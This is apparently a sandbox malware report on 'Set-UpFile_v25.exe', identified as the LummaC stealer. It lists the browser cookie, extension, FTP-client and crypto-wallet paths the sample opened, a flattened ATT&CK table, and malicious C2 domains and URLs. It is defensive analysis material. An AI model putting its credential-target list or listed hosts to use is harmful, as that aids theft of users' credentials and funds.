            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: Yara matchFile source: Process Memory Space: Set-UpFile_v25.exe PID: 7272, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: Set-UpFile_v25.exe PID: 7272, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		221
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts12
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory221
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol41
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell            		Logon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture114
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials32
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://klipvumisui.shop/int_clp_sha.txt%100%Avira URL Cloudmalware
            https://beattalkerz.cyou/apila0%Avira URL Cloudsafe
            https://beattalkerz.cyou/F0%Avira URL Cloudsafe
            https://beattalkerz.cyou:443/api0%Avira URL Cloudsafe
            https://beattalkerz.cyou/api0%Avira URL Cloudsafe
            https://beattalkerz.cyou/api00%Avira URL Cloudsafe
            https://klipvumisui.shop/int_clp_sha.txtf1R=100%Avira URL Cloudmalware
            https://klipvumisui.shop:443/int_clp_sha.txt100%Avira URL Cloudmalware
            https://beattalkerz.cyou/apibu0%Avira URL Cloudsafe
            https://beattalkerz.cyorT0%Avira URL Cloudsafe
            https://beattalkerz.cyou/4I0%Avira URL Cloudsafe
            https://beattalkerz.cyou/apijh0%Avira URL Cloudsafe
            beattalkerz.cyou0%Avira URL Cloudsafe
            https://beattalkerz.cyou/apiF90%Avira URL Cloudsafe
            https://klipvumisui.shop/int_clp_sha.txtcoded100%Avira URL Cloudmalware
            https://beattalkerz.cyou/apilMQ-$0%Avira URL Cloudsafe
            https://beattalkerz.cyou/apizp0%Avira URL Cloudsafe
            https://dfgh.online/invoker.php?compName=user-PCx100%Avira URL Cloudmalware
            https://beattalkerz.cyou/api9bf$0%Avira URL Cloudsafe
            https://klipvumisui.shop/int_clp_sha.txt.3100%Avira URL Cloudmalware
            https://beattalkerz.cyou/apic0%Avira URL Cloudsafe
            https://beattalkerz.cyou/y0%Avira URL Cloudsafe
            https://beattalkerz.cyou/apis0%Avira URL Cloudsafe
            https://beattalkerz.cyou/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cegu.shop
            		185.161.251.21
            		truefalse
              		high
              beattalkerz.cyou
              		104.21.25.52
              		truetrue
                		unknown
                dfgh.online
                		unknown
                		unknownfalse
                  		high
                  klipvumisui.shop
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://beattalkerz.cyou/apitrue
                    • Avira URL Cloud: safe
                    		unknown
                    rabidcowse.shopfalse
                      		high
                      wholersorie.shopfalse
                        		high
                        beattalkerz.cyoutrue
                        • Avira URL Cloud: safe
                        		unknown
                        cloudewahsj.shopfalse
                          		high
                          noisycuttej.shopfalse
                            		high
                            nearycrepso.shopfalse
                              		high
                              https://cegu.shop/8574262446/ph.txtfalse
                                		high
                                framekgirus.shopfalse
                                  		high
                                  tirepublicerj.shopfalse
                                    		high
                                    abruptyopsn.shopfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabSet-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://beattalkerz.cyou:443/apiSet-UpFile_v25.exe, 00000000.00000003.1908751924.0000000000889000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1907710395.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000888000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000002.1962678644.000000000088B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/ac/?q=Set-UpFile_v25.exe, 00000000.00000003.1791976489.00000000036BD000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792070865.00000000036BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://klipvumisui.shop:443/int_clp_sha.txtSet-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000816000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://contoso.com/Licensepowershell.exe, 00000004.00000002.1978484027.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
